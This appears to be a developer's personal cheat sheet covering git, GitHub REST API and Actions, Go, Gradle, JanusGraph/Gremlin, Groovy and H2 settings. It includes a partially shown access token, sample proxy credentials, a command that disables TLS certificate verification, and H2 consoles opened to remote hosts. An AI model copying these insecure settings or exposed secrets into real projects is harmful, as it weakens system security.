mkdir /home/projects/bmw/temp/repo3
cd /home/projects/bmw/temp/repo3
git clone file:///home/projects/bmw/temp/repo

configuration for proxy server, proxy configuration

set proxy, using proxy

git config --global http.proxy 139.7.95.74:8080
# proxy settings
git config --global http.proxy http://proxyuser:[email protected]:8080
git config --global https.proxy 139.7.95.74:8080

check proxy, get proxy

git config --global --get http.proxy

remove proxy configuration, unset proxy

git config --global --unset http.proxy

using additional command before 'fetch' 'push', custom fetch/push

# remote: 'receive.denyCurrentBranch' configuration variable to 'refuse'.
git config core.sshCommand 'ssh -i private_key_file'

set configuration

git config --local receive.denyCurrentBranch updateInstead

remove auto replacing CRLF for LF on Windows OS

.gitattributes

*.sh -crlf

http certificate ssl verification

git config --system http.sslcainfo C:\soft\git\usr\ssl\certs\ca-bundle.crt
# or 
git config --system http.sslverify false

download latest release from github, release download

GIT_ACCOUNT=ajaxray
GIT_PROJECT=geek-life
GIT_RELEASE_ARTIFACT=geek-life_linux-amd64
wget https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest/download/$GIT_RELEASE_ARTIFACT

# curl -s https://api.github.com/repos/bugy/script-server/releases/latest | grep browser_download_url | cut -d '"' -f 4

download latest release with tag

GIT_ACCOUNT=mozilla
GIT_PROJECT=geckodriver
RELEASE_FILE_BEFORE_TAG="geckodriver-"
RELEASE_FILE_AFTER_TAG="-linux64.tar.gz"

release_url=https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/latest
latest_release_url=$(curl -s -I -L -o /dev/null -w '%{url_effective}' $release_url)
release_tag=`echo $latest_release_url | awk -F '/' '{print $NF}'`
release_file=$RELEASE_FILE_BEFORE_TAG$release_tag$RELEASE_FILE_AFTER_TAG

release_download="https://github.com/${GIT_ACCOUNT}/${GIT_PROJECT}/releases/download/${release_tag}/$release_file"

# Create a directory for downloads
output_dir="/home/soft/selenium-drivers"
file_name=gekodriver-mozilla
# Create the output directory if it doesn't exist
mkdir -p "$output_dir"
# Download the latest release
curl -L -o $output_dir/${file_name}.tar.gz "$release_download"

tar -xzf $output_dir/${file_name}.tar.gz -C $output_dir
mv $output_dir/geckodriver $output_dir/$file_name
chmod +x $output_dir/$file_name
$output_dir/$file_name --version

download latest version of file from github, url to source, source download

GIT_ACCOUNT=cherkavi
GIT_PROJECT=cheat-sheet
GIT_BRANCH=master
GIT_PATH=git.md
wget https://raw.githubusercontent.com/$GIT_ACCOUNT/$GIT_PROJECT/$GIT_BRANCH/$GIT_PATH

linux command line changes

#git settings parse_git_branch() {
parse_git_branch() {
     git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/ (\1)/'
}
export PS1="\[\033[32m\]\W\[\033[33m\]\$(parse_git_branch)\[\033[00m\] $ " 

ignore tracked file, ignore changes

git update-index --assume-unchanged .idea/vcs.xml

hooks

check commit message

mv .git/hooks/commit-msg.sample .git/hooks/commit-msg
result=`cat $1 | grep "^check-commit"`

if [ "$result" != "" ]; then
	exit 0
else 
	echo "message should start from 'check-commit'"
	exit 1
fi

if you want to commit hooks, then create separate folder and put all files there

git --git-dir $DIR_PROJECT/integration-prototype/.git config core.hooksPath $DIR_PROJECT/integration-prototype/.git_hooks

git template message template

git --git-dir $DIR_PROJECT/integration-prototype/.git config commit.template $DIR_PROJECT/integration-prototype/.commit.template
pip install gitlint
gitlint install-hook

.gitlint

# See http://jorisroovers.github.io/gitlint/rules/ for a full description.
[general]
ignore=T3,T5,B1,B5,B7
[title-match-regex]
regex=^[A-Z].{0,71}[^?!.,:; ]

advices

migration from another git repo

image

big monorepo increase git responsivnes

git config core.fsmonitor true
git config core.untrackedcache true

time git status

fix commit to wrong branch

fix wrong branch commit

rest api collaboration

GITHUB_USER=cherkavi
GITHUB_PROJECT=python-utilities
GITHUB_TOKEN=$GIT_TOKEN

curl https://api.github.com/users/$GITHUB_USER
curl https://api.github.com/users/$GITHUB_USER/repos
curl https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT

git ENTERPRISE rest api ( maybe you are looking for: take a look into )

export PAT=07f1798524d6f79...
export GIT_USER=tech_user
export GIT_REPO_OWNER=another_user
export GIT_REPO=system_description
export GIT_URL=https://github.sbbgroup.zur

git rest api
git endpoints

# read user's data 
curl -H "Authorization: token ${PAT}" ${GIT_URL}/api/v3/users/${GIT_USER}
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/users/${GIT_REPO_OWNER}

# list of repositories 
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/users/${GIT_REPO_OWNER}/repos | grep html_url

# read repository
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}
curl -H "Authorization: token ${PAT}" ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}

# read path
export FILE_PATH=doc/README
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH}
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq .download_url

# https://docs.github.com/en/[email protected]/rest/reference/repos#contents
# read path to file 
DOWNLOAD_URL=`curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq .download_url | tr '"' ' '`
echo $DOWNLOAD_URL 
curl -u ${GIT_USER}:${PAT} -X GET $DOWNLOAD_URL

# read content
curl -u ${GIT_USER}:${PAT} ${GIT_URL}/api/v3/repos/${GIT_REPO_OWNER}/${GIT_REPO}/contents/${FILE_PATH} | jq -r ".content" | base64 --decode
# GIT_URL=https://github.ubsbank.ch
# GIT_API_URL=$GIT_URL/api/v3

GIT_API_URL=https://api.github.com

# get access to repo 
# Paging: !!! Check if there is a 'Link' header with a 'rel="next"' link
function git-api-get(){
    curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}${1}"
}


# list of all accessing endpoints
git-api-get 

# user info
GIT_USER_NAME=$(git-api-get /user | jq -r .name)
echo $GIT_USER_NAME

# repositories
git-api-get /users/$GIT_USER_NAME/repos

# git rest with page size  
git-api-get /users/${GIT_USER}/repos?per_page=100 | jq ".[] | [.fork, .clone_url]"


GIT_REPO_OWNER=swh
GIT_REPO_NAME=data-warehouse
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME

# pull requests
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls

PULL_REQUEST_NUMBER=20203
# pull request info
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER
# | jq -c '[.[] | {ref:.head.ref, body:.body, user:.user.login, created:.created_at, updated:.updated_at, state:.state, draft:.draft, reviewers_type:[.requested_reviewers[].type], reviewers_login:[.requested_reviewers[].login], request_team:[.requested_teams[].name], labels:[.labels[].name]}]'

# pull request files
git-api-get /repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER/files | jq .[].filename
# search for pull request 
ISSUE_ID=MAGNUM-1477
# use + sign instead of space
SEARCH_STR="is:pr+${ISSUE_ID}"
curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}/search/issues?q=${SEARCH_STR}&sort=created&order=asc" 

# print all files by pull request
ISSUE_ID=$1
SEARCH_STR="is:pr+${ISSUE_ID}"
PULL_REQUESTS=(`curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url "${GIT_API_URL}/search/issues?q=${SEARCH_STR}&sort=created&order=asc"  | jq .items[].number`)

# Iterate over all elements in the array
for PULL_REQUEST_NUMBER in "${PULL_REQUESTS[@]}"; do
    echo "------$GIT_URL/$GIT_REPO_OWNER/$GIT_REPO_NAME/pull/$PULL_REQUEST_NUMBER------"
    curl -s --request GET  --header "Authorization: Bearer $GIT_TOKEN_REST_API" --url ${GIT_API_URL}/repos/$GIT_REPO_OWNER/$GIT_REPO_NAME/pulls/$PULL_REQUEST_NUMBER/files | jq .[].filename
    echo "--------------------"
done

github credentials

start page

  • _octo

login page

  • _octo
  • logged_in
  • preferred_color_mode
  • tz
  • _gh_sess

after login

  • _octo

  • color_mode

  • dotcom_user

  • logged_in

  • preferred_color_mode

  • tz

  • __Host-user_session_same_site

  • _device_id

  • _gh_sess

  • has_recent_activity

  • saved_user_sessions

  • tz

  • user_session

github rest api

github rest api

create REST API token

## create token with UI 
x-www-browser https://github.com/settings/personal-access-tokens/new

## list of all tokens
x-www-browser https://github.com/settings/tokens
export GITHUB_TOKEN=$GIT_TOKEN

github user

GITHUB_USER=cherkavi
curl https://api.github.com/users/$GITHUB_USER

git workflow secrets via REST API

  • list of the secrets
curl -H "Authorization: Bearer $GIT_TOKEN" https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT/actions/secrets
curl -H "Authorization: token $GIT_TOKEN" https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT/actions/secrets
export GITHUB_TOKEN=$GIT_TOKEN_UDACITY
export GITHUB_PROJECT_ID=`curl https://api.github.com/repos/$GITHUB_USER/$GITHUB_PROJECT | jq .id`
export GITHUB_PUBLIC_KEY_ID=`curl -X GET -H "Authorization: Bearer $GITHUB_TOKEN" "https://api.github.com/repos/$OWNER/$REPO/actions/secrets/public-key" | jq -r .key_id`
export OWNER=cherkavi
export REPO=udacity-github-cicd

export SECRET_NAME=my_secret_name
export BASE64_ENCODED_SECRET=`echo -n "my secret value" | base64`
curl -X PUT -H "Authorization: Bearer $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" \
  -d '{"encrypted_value":"'$BASE64_ENCODED_SECRET'","key_id":"'$GITHUB_PUBLIC_KEY_ID'"}' \
  https://api.github.com/repos/$OWNER/$REPO/actions/secrets/$SECRET_NAME

curl -X PUT -H "Authorization: Bearer $GITHUB_TOKEN" -H "Accept: application/vnd.github.v3+json" \
  -d '{"encrypted_value":"'$BASE64_ENCODED_SECRET'","key_id":"'$GITHUB_PUBLIC_KEY_ID'"}' \
  https://api.github.com/repos/$OWNER/$REPO/actions/secrets/$SECRET_NAME

https://api.github.com/repositories/REPOSITORY_ID/environments/ENVIRONMENT_NAME/secrets/SECRET_NAME
https://api.github.com/repos/OWNER/REPO/actions/secrets/SECRET_NAME

curl -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/repos/$OWNER/$REPO/actions/secrets/$SECRET_NAME

github render/run html/js/javascript files from github

githack.com

Development

https://raw.githack.com/[user]/[repository]/[branch]/[filename.ext]

Production (CDN)

https://rawcdn.githack.com/[user]/[repository]/[branch]/[filename.ext]
https://raw.githack.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

github.io

http://htmlpreview.github.io/?[full path to html page]

http://htmlpreview.github.io/?https://github.com/cherkavi/javascripting/blob/master/d3/d3-bar-chart.html
http://htmlpreview.github.io/?https://github.com/twbs/bootstrap/blob/gh-pages/2.3.2/index.html

git find bad commit, check bad commits in the log

git bisect start.
git bisect bad [commit].
git bisect good [commit].
# git bisect bad  # mark commit as bad
# git bisect good # mark commit as good

git bisect run my_script my_script_arguments  # check negative/positive answer
git bisect visualize
git bisect reset

git remove bad commit from the log history

mkdir git-wrong-commit
cd git-wrong-commit
git init

echo "1" >> test-file.txt 
git add *
git commit --message 'commit 1'
git log --oneline

echo "2" >> test-file.txt 
git add *
git commit --message 'commit 2'
git log --oneline

echo "3" >> test-file.txt 
git add *
git commit --message 'commit 3'
git log --oneline


echo "wrong" >> test-file.txt 
git add *
git commit --message 'commit 4 - wrong'
git log --oneline


echo "5" >> test-file.txt 
git add *
git commit --message 'commit 5'
git log --oneline

echo "6" >> test-file.txt 
git add *
git commit --message 'commit 6'
git log --oneline

# will not work: short commit like ce66b4f 
# will not work: variable instead of commit hash WRONG_COMMIT=ce66b4f6065c754a2c3dbc436bc82498dd04d722
#                if [ $GIT_COMMIT = $WRONG_COMMIT ]; 
git filter-branch --commit-filter 'if [ $GIT_COMMIT = ce66b4f6065c754a2c3dbc436bc82498dd04d722 ]; then skip_commit "$@"; else git commit-tree "$@"; fi' -- --all

git push --force 

gh cli command line tool

gh auth login --hostname $GIT_HOST
gh auth status

WORKFLOW_FILE_NAME=tools.yaml

gh workflow list
gh workflow view --ref $GIT_BRANCH_NAME $WORKFLOW_FILE_NAME
gh workflow run $WORKFLOW_FILE_NAME --ref $GIT_BRANCH_NAME
gh run list --workflow=$WORKFLOW_NAME

# run workflow by name from last branch
gh workflow run $WORKFLOW_FILE_NAME --ref $(git branch --show-current)

# print out last log output of the workflow by name
gh run view --log $(gh run list --json databaseId --jq '.[0].databaseId')



gh variable list
gh variable set $VARIABLE_NAME --body $VARIABLE_VALUE

# search pull request via CLI, search not opened pull requests
gh pr list -S 'author:cherkavi is:merged'

gh complete

eval "$(gh completion -s bash)"

github actions (workflow, pipeline )

github marketplace - collections of actions to use

flowchart LR
s[step] --o j[job] --o p[pipeline]
t[trigger] --> p
e[event] --> p
Loading
  • env variables: ${{...}}
  • file sharing
  • job image
  • jobs:
    • parallel
    • sequence
  • agent/node
  • events:
    • manual
    • auto
    • schedule
  • place for workflows
touch .github/workflows/workflow-1.yml
  • simple example of the workflow
name: name of the workflow
on:
  pull_request:
    branches: [features]
    types: [closed]
  workflow_dispatch:
  schedule:
    - cron: '0 0 * * *'
  push:
    branches: 
      - master

jobs:
  name-of-the-job:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout
      uses: actions/checkout@v3 

checkout with submodules ( avoid issue with not visible "last commit" ) :

    steps:
    - name: Checkout
      uses: actions/checkout@v3
    - name: Checkout module update
      run: git submodule update --remote
  • workflow with env variable
env:
  # Set Node.js Version
  NODE_VERSION: '18.x'
jobs:
  install-build-test:
    runs-on: ubuntu-latest

    steps:
    - name: Check out
      uses: actions/checkout@v3

    - name: Set environment variable
      run: echo "DEST_VERSION=${{ env.NODE_VERSION }}" >> $GITHUB_ENV

    - name: npm with node js
      uses: actions/setup-node@v3
      with:        
        node-version: ${{env.DEST_VERSION}} # node-version: ${{env.NODE_VERSION}}
        cache: 'npm'
name: 'input output example'
description: 'Greet someone'
inputs:
  person-name:  
    description: 'input parameter example'
    required: true
    default: 'noone'
outputs:
  random-number:
    description: "Random number"
    value: ${{ steps.random-number-generator.outputs.random-id }}
runs:
  using: "composite"
  steps:
    - id: simple-print
      run: echo Hello ${{ inputs.person-name }}.
    - id: change-dir-and-run
      run: cd backend && npm ci
    - id: output-value
      run: echo "::set-output name=random-id::$(echo $RANDOM)"
      if: ${{ github.event_name == 'pull_request' }} # if: github.ref == 'refs/heads/main'
    - id: conidtion-from-previous-step
      run: echo "random was generated ${{steps.blue_status.outputs.status}}"
      if: steps.output-value.outputs.random-id != ''
  • workflow with input parameter
name: ping ip-address

on:
  workflow_dispatch:
    inputs:
      target:
        description: 'target address'
        required: true

jobs:
  ping_and_traceroute:
    runs-on: ubuntu-latest
    steps:
      - name: Run commands
        run: |
          sudo apt update
          sudo apt install -y traceroute 
          ping -c 5 ${{ github.event.inputs.target }}
          traceroute ${{ github.event.inputs.target }}
        shell: bash
gh workflow run ping.yaml --ref main -f target=8.8.8.8

workflow specific variables like github.xxxxx
workflow specific variables like jobs.xxxxx
workflow environment variables

  • workflow with waiting for run
  step-1:
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "step 1"
  step-2:
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "step 2"
        
  post-build-actions:
    needs: [step-1, step-2]
    runs-on: ubuntu-latest
    steps:
      - name: echo
        run: echo "after both"
  • run cloud formation, aws login
# Workflow name
name: create-cloudformation-stack

jobs:
  create-stack:
    runs-on: ubuntu-latest
    steps:
    - name: Checkout
      uses: actions/checkout@v3
   
    - name: AWS credentials
      uses: aws-actions/configure-aws-credentials@v2
      with:
        aws-access-key-id: ${{ secrets.AWS_ACCESS_KEY_ID }}
        aws-secret-access-key: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        aws-session-token: ${{secrets.AWS_SESSION_TOKEN}}
        aws-region: us-east-1

    - name: Create CloudFormation Stack
      uses: aws-actions/aws-cloudformation-github-deploy@v1
      with:
        name: run cloudformation script
        template: cloudformation.yml

einaregilsson/beanstalk-deploy@v21

  • actions use secrets, aws login rest api

git workflow secrets aws login, aws login

    steps:
    - name: Access ot aws
      env:
        AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
        AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        AWS_SESSION_TOKEN: ${{ secrets.AWS_SESSION_TOKEN }}
      run: |
        aws configure set default.region us-east-1      
        aws elasticbeanstalk delete-environment --environment-name my-node-app-pr-${{ github.event.pull_request.number }}
  • run python application, install oracle client, hide password, use variables
      - name: cache file 
        id: cache-oracle-client-zip
        uses: actions/cache@v3
        with:
          path: ~/
          key: extfile-${{ hashFiles('**/instantclient-basiclite-linux.x64-23.4.0.24.05.zip') }}
          restore-keys: |
            oraclezipfile-

      - name: Download Instant Client
        if: steps.cache-oracle-client-zip.outputs.cache-hit != 'true'
        run: |
          sudo apt-get update
          sudo apt-get install libaio1 wget unzip
          wget https://download.oracle.com/otn_software/linux/instantclient/2340000/instantclient-basiclite-linux.x64-23.4.0.24.05.zip

      - name: Unzip archive file 
        run: |
          rm -rf instantclient_23_4
          unzip -o instantclient-basiclite-linux.x64-23.4.0.24.05.zip
          # sudo mv instantclient_23_4 /opt/oracle  # libclntsh.so
          echo "export LD_LIBRARY_PATH=$(pwd)/instantclient_23_4:$LD_LIBRARY_PATH" >> $GITHUB_ENV 

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install -r requirements.txt   # cx_Oracle

      - name: Oracle sql request
        run:  echo "SELECT *
                from dual
              " > query.sql

      - name: Set new environment variable
        run: | 
          echo "ORACLE_USER=${{ vars.ORACLE_INT_USER }}" >> $GITHUB_ENV
          echo "ORACLE_HOST=${{ vars.ORACLE_INT_HOST }}" >> $GITHUB_ENV
          echo "ORACLE_PORT=${{ vars.ORACLE_INT_PORT }}" >> $GITHUB_ENV
          echo "ORACLE_SERVICE=${{ vars.ORACLE_INT_SERVICE }}" >> $GITHUB_ENV
          echo "OUTPUT_FILE=report.csv" >> $GITHUB_ENV
          echo "ORACLE_REQUEST=query.sql" >> $GITHUB_ENV
      
      - name: Run Python script
        run: |
          # ls "$(pwd)"/instantclient_23_4
          ORACLE_PASS=${{ secrets.ORACLE_INT_PASS }} LD_LIBRARY_PATH=$(pwd)"/instantclient_23_4" python oracle-select-to-csv.py
  • action to use cache
- name: cache file 
  id: cache-ext-file
  uses: actions/cache@v3
  with:
    path: ~/    # folder with file 
    key: extfile-${{ hashFiles('**/archive.tar.gz') }}
    restore-keys: |
      extfile-
- name: download and extract
  if: steps.cache-ext-file.outputs.cache-hit != 'true'
  run: |
    mkdir -p folder_with_file
    curl -O https://archive.com/application/archive.tar.gz
    tar -xzf archive.tar.gz -C foldeer_with_file
  • communicate with next step
      - name: list files on SSH 
        id: ssh_step
        run: |
          csv_file_count=`ls *.csv | wc -l`
          if [[ $csv_file_count > 0 ]]; then
            file_name="report_"$(date +"%Y-%m-%d-%H-%M-%S")".zip"
            zip -r  $file_name . -i \*.csv
            echo "::set-output name=file_name::$file_name"
          fi

      - name: print archive file
        if: steps.ssh_step.outputs.file_name != ''        
        run: |
          echo "path: ${{ steps.ssh_step.outputs.file_name }}"

:TODO: Github Action how to connect localhost runner to github.action ?

Go lang cheat sheet

# default path according: https://go.dev/doc/install
export GOROOT=/usr/local/go
export PATH=$PATH:$GOROOT/bin
# go libraries/packages path
export GOPATH=/home/soft/go_lib

Links

Issues

bazel buildfier

intention

go install github.com/bazelbuild/buildtools/buildifier@latest

error message

can't load package: package github.com/bazelbuild/buildtools/buildifier@latest: cannot use path@version syntax in GOPATH mode

solution

GOPATH=/home/projects/goroot
go install github.com/bazelbuild/buildtools/buildifier
cd $GOPATH/src/github.com/bazelbuild/buildtools/buildifier
bazel build :all

possible (didn't check it) alternative way

go mod init buildifier
# go mod init .
go mod download repo@version
# go mod download github.com/bazelbuild/buildtools/buildifier@latest

buildfier

/home/projects/goroot/bin/buildifier -mode fix {file_path}
# bazel run //bazel/tools/buildifier:fix

Gradle cheat sheet

setup

DEST_FOLDER=$HOME_SOFT/gradle/bash_completion
mkdir -p $DEST_FOLDER
curl -LA gradle-completion https://edub.me/gradle-completion-bash -o $DEST_FOLDER/gradle-completion.bash

echo 'source $HOME_SOFT/gradle/bash_completion/gradle-completion.bash' >> ~/.bashrc

gradle commands

print all dependencies for project, dependency tree

gradlew dependencies

download dependencies to separate folder

task downloadDependenciesToRuntime(type: Copy) {
    from sourceSets.main.runtimeClasspath
    into 'runtime/'
}

execute gradle with specific build.gradle file

gradlew.bat -b migration-job/build.gradle build

quite output, output without messages

gradlew.bat -q build

gradle debug

https://docs.gradle.org/current/userguide/build_environment.html gradle -Dorg.gradle.debug=true --no-daemon clean

skip tests

gradlew build -x test gradlew test --test "com.example.android.testing.blueprint.unit.integrationTests.*"

execute single test

gradlew test -Dtest.single=< wildcard of test > build

custom task, run script

init groovy project

gradle init --groovy-application
gradle init --type java-library
  • java-application
  • java-library
  • scala-library
  • groovy-library
  • basic

execute groovy script

add into build.gradle

task runScript (dependsOn: 'classes', type: JavaExec) {
    main = 'App'
    classpath = sourceSets.main.runtimeClasspath
}

execute script

gradle runtScript

proxy settings

gradle build -Dhttp.proxyHost=proxy-host -Dhttp.proxyPort=8080 -Dhttp.proxyUser=q4577777 -Dhttp.proxyPassword=my-password

Graph Database cheat sheet

links

UI editor

janus gremlin

start with docker

docker container on localhost ( avoid of installation )

# start Janus server
docker pull janusgraph/janusgraph:0.6
# x-www-browser https://hub.docker.com/r/janusgraph/janusgraph/tags
DOCKER_TAG=0.6
docker run --rm --name janusgraph-default --volume `pwd`:/workspace:rw --network="host" janusgraph/janusgraph:$DOCKER_TAG
# start Gremlin console
docker exec -e GREMLIN_REMOTE_HOSTS=localhost -it  janusgraph-default ./bin/gremlin.sh

# connect to Janus container
# docker exec -e GREMLIN_REMOTE_HOSTS=localhost -it  janusgraph-default /bin/bash

docker containers with link between containers

# Janus server
docker rm janusgraph-default
docker run --name janusgraph-default janusgraph/janusgraph:latest
# --port 8182:8182

# Gremlin console in separate docker container
docker run --rm --link janusgraph-default:janusgraph -e GREMLIN_REMOTE_HOSTS=janusgraph -it janusgraph/janusgraph:latest ./bin/gremlin.sh

Gremlin console

Embedded connection ( local )

// with local connection
graph = TinkerGraph.open()
// g = traversal().withEmbedded(graph)
graph.features()

g = graph.traversal()

remote connection with submit

// connect to database, during the start should be message in console like: "plugin activated: tinkerpop.server"
:remote connect tinkerpop.server conf/remote.yaml
// check connection
:remote
// --------- doesn't work:
// config = new PropertiesConfiguration()
// config.setProperty("clusterConfiguration.hosts", "127.0.0.1");
// config.setProperty("clusterConfiguration.port", 8182);
// config.setProperty("clusterConfiguration.serializer.className", "org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0");
// ioRegistries = org.janusgraph.graphdb.tinkerpop.JanusGraphIoRegistry
// config.setProperty("clusterConfiguration.serializer.config.ioRegistries", ioRegistries); // (e.g. [ org.janusgraph.graphdb.tinkerpop.JanusGraphIoRegistry) ]
// config.setProperty("gremlin.remote.remoteConnectionClass", "org.apache.tinkerpop.gremlin.driver.remote.DriverRemoteConnection");
// config.setProperty("gremlin.remote.driver.sourceName", "g");
// graph = TinkerGraph.open(config)
// --------- doesn't work:
// graph = EmptyGraph.instance().traversal().withRemote(config);
// g = graph.traversal()

remote connection without submit

import static org.apache.tinkerpop.gremlin.process.traversal.AnonymousTraversalSource.traversal;
g = traversal().withRemote("conf/remote-graph.properties");

??? doesn't work with connecting points

// with remote connection
cluster = Cluster.build().addContactPoint('127.0.0.1').create()
client = cluster.connect()
// g = traversal().withRemote(DriverRemoteConnection.using("localhost", 8182));
g = new GraphTraversalSource(DriverRemoteConnection.using(client, 'g'))

gremlin simplest dataset example

WARN: default connection is local, need to "submit" each time

// insert data, add :submit if you did't connect to the cluster
// :submit g.addV('person').....
alice=g.addV('Alice').property('sex', 'female').property('age', 30).property('name','Alice');
bob=g.addV('Bob').property('sex', 'male').property('age', 35).property('name','Bob').as("Bob");
marie=g.addV('Marie').property('sex', 'female').property('age', 5).property('name','Marie');
g.tx().commit() // only for transactional TraversalSource

// select id of element
alice_id=g.V().hasLabel('Alice').id().next();
bob_id=g.V().has('name','Bob').id().next()
alice_id=g.V().has('name','Alice').id().next()
marie_id=g.V().has('name','Marie').id().next()
bob=g.V( bob_id )
alice=g.V( alice_id )
:show variables

// select vertex
g.V() \
 .has("sex", "female") \
 .has("age", lte(30)) \
 .valueMap("age", "sex", "name")
//  .values("age")       


// g.V().hasLabel('Bob').addE('wife').to(g.V().has('name', 'Alice'))
// The child traversal of [GraphStep(vertex,[]), HasStep([name.eq(Alice)])] was not spawned anonymously - use the __ class rather than a TraversalSource to construct the child traversal
g.V(bob_id).addE('wife').to(__.V(alice_id)) \
 .property("start_time", 2010).property("place", "Canada");

g.V().hasLabel('Bob').addE('daughter').to(__.V().has('name', 'Marie')) \
 .property("start_time", 2013).property("birth_place", "Toronto");

g.addE('mother').to(__.V(alice_id)).from(__.V(marie_id))


// select all vertices
g.V().id()

// select all edges
g.E()

// select data: edges out of
g.V().has("name","Bob").outE()
// select data: edges in to
g.V().has("name","Alice").inE().outV().values("name")
// select data: out edge(wife), point in 
g.V().has("name","Bob").outE("wife").inV().values("name")
// select data: out edge(wife), point to Vertext, in edge(mother), coming from 
g.V().has("name","Bob").outE("wife").inV().inE("mother").outV().values("name")


// remove Vertex
g.V('4280').drop()

// remove Edge
g.V().has("name", "Bob").outE("wife").drop()


:exit
// export DB to GraphSON ( JSON )
g.io("/workspace/output.json").with(IO.writer, IO.graphson).write().iterate()
// import from GraphSON ( JSON ) to DB
g.io("/workspace/output.json").with(IO.reader, IO.graphson).read().iterate()

// export DB to GraphML ( XML )
g.io("/workspace/output.xml").with(IO.writer, IO.graphml).write().iterate()
// import from GraphML ( XML ) to DB
g.io("/workspace/output.xml").with(IO.reader, IO.graphml).read().iterate()

// ------------ doesn't work
// import db
// graph = JanusGraphFactory.open('conf/janusgraph.properties')
// graph = JanusGraphFactory.open('conf/remote-graph.properties')
// reader = g.graph.io(graphml()).reader().create()
// inputStream = new FileInputStream('/workspace/simple-dataset.graphml')
// reader.readGraph(inputStream, g.graph)
// inputStream.close()

g.V()
# x-www-browser https://pypi.org/project/gremlinpython/
pip3 install gremlinpython

python obtain traversal

from gremlin_python.process.anonymous_traversal import traversal
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
g = traversal().withRemote(DriverRemoteConnection('ws://127.0.0.1:8182/gremlin','g'))

python obtain traversal

from gremlin_python.process.graph_traversal import __
from gremlin_python.process.traversal import T
from gremlin_python.process.traversal import IO
from gremlin_python.structure.graph import Graph
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection

g = Graph().traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin', 'g'))

python read values

for each in g.V().valueMap(True).toList():
    print(each)

v1 = g.V().valueMap(True).toList()[0]
v1.id
v1.label

python drop values

id_of_vertex=4096
g.V(id_of_vertex).drop().iterate()

script from file

# this path is **server path** not the local one
PATH_TO_EXPORT_JSON="/workspace/output.json"
g.io(PATH_TO_EXPORT_JSON).with_(IO.reader, IO.graphson).read().iterate()

groovy lang

links

groovysh

default set of libraries

$HOME/.groovy/lib

parse json

JSON slurper

strings

def singleQuote = 'Single quote string'
def doubleQuote = "Double quote string"
def slashy = /Slashy string/

gRPC

links

flowchart LR

subgraph client [client side]
direction TB

ca[client application] -->|1| ced[client encoding]

ced -->|2 client| cr[gRPC Runtime]

cr -->|3| ctr[transport]
end

subgraph server [server side]
direction TB

ctr -->|4| str[transport]
str -->|5| sr[gRPC Runtime]
sr -->|6| sed[client decoding] 
sed -->|7| sa[server application]
end


sa --> sed
sed --> sr
sr --> str

str --> ctr
ctr --> cr
cr --> ced
ced --> ca

Loading

h2 Oracle dialect

spring.datasource.url=jdbc:h2:mem:testdb;Mode=Oracle
spring.datasource.platform=h2
spring.datasource.driver-class-name=org.h2.Driver
spring.jpa.hibernate.ddl-auto=none
spring.datasource.continue-on-error=true

activate console via property file

spring.h2.console.enabled=true
spring.h2.console.path=/h2-console
spring.h2.console.settings.web-allow-others=true
spring.h2.console.settings.trace=true

h2 yaml version

###
#   Database Settings
###
spring:
  datasource:
    # url: jdbc:h2:mem:user-app;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE
    url: jdbc:h2:~/user-manager.h2;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE
    platform: h2
    username: sa
    password:
    driverClassName: org.h2.Driver
  jpa:
    database-platform: org.hibernate.dialect.H2Dialect
    hibernate:
      ddl-auto: update
    properties:
      hibernate:
        show_sql: false
        use_sql_comments: true
        format_sql: true

###
#   H2 Settings
###
  h2:
    console:
      enabled: true
      path: /console
      settings:
        trace: false
        web-allow-others: false

print help

java -cp h2-1.4.192.jar org.h2.tools.Server -?

Server mode start, web console start

java -jar h2-1.4.192.jar  -webAllowOthers -webPort 9108 -tcpAllowOthers -tcpPort 9101 -tcpPassword sa

connection !!! file placed into the same folder when application was started !!! path with current folder - mandatory

jdbc:h2:tcp://localhost:9101/./user-manager.h2

Server mode start, web console start, with specifying folder where file with data placed

